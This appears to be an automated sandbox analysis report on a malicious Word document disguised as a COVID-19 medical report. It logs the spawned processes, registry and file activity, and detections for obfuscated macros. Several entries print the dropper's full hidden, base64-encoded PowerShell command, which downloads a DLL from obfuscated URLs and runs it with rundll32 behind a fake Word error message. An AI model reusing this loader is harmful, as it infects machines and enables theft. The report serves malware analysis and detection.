Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKABKACcAKwAnACkAJwApACkAKwAnACgAJ
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll #1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll #1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hnzj\wmdqdo.qxu',RunDLL
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file. Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKABKACcAKwAnACkAJwApACkAKwAnACgAJ Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll #1 Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll #1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hnzj\wmdqdo.qxu',RunDLL Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32 Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Window found: window name: SysTabControl32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2116228090.0000000002BB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2116228090.0000000002BB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2116228090.0000000002BB7000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000005.00000002.2116228090.0000000002BB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\mscorlib.pdb.dll source: powershell.exe, 00000005.00000002.2116228090.0000000002BB7000.00000004.00000040.sdmp
Source: Binary string: scorlib.pdb source: powershell.exe, 00000005.00000002.2116228090.0000000002BB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000005.00000002.2116228090.0000000002BB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2116228090.0000000002BB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2116228090.0000000002BB7000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2116228090.0000000002BB7000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdb* source: powershell.exe, 00000005.00000002.2116228090.0000000002BB7000.00000004.00000040.sdmp
Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000005.00000002.2116228090.0000000002BB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2116228090.0000000002BB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2116228090.0000000002BB7000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2116036824.0000000002930000.00000002.00000001.sdmp
Source: GT-9333 Medical report COVID-19.doc Initial sample: OLE summary subject = National Gorgeous Handcrafted Rubber Chicken Identity transmitting Metal Tasty

Data Obfuscation:

barindex
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Source: GT-9333 Medical report COVID-19.doc Stream path 'Macros/VBA/Lxvinhyq0hu0i' : High number of GOTO operations
Source: VBA code instrumentation OLE, VBA macro, High number of GOTO operations: Module Lxvinhyq0hu0i Name: Lxvinhyq0hu0i
PowerShell case anomaly found
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzA
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKABKACcAKwAnACkAJwApACkAKwAnACgAJ
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwB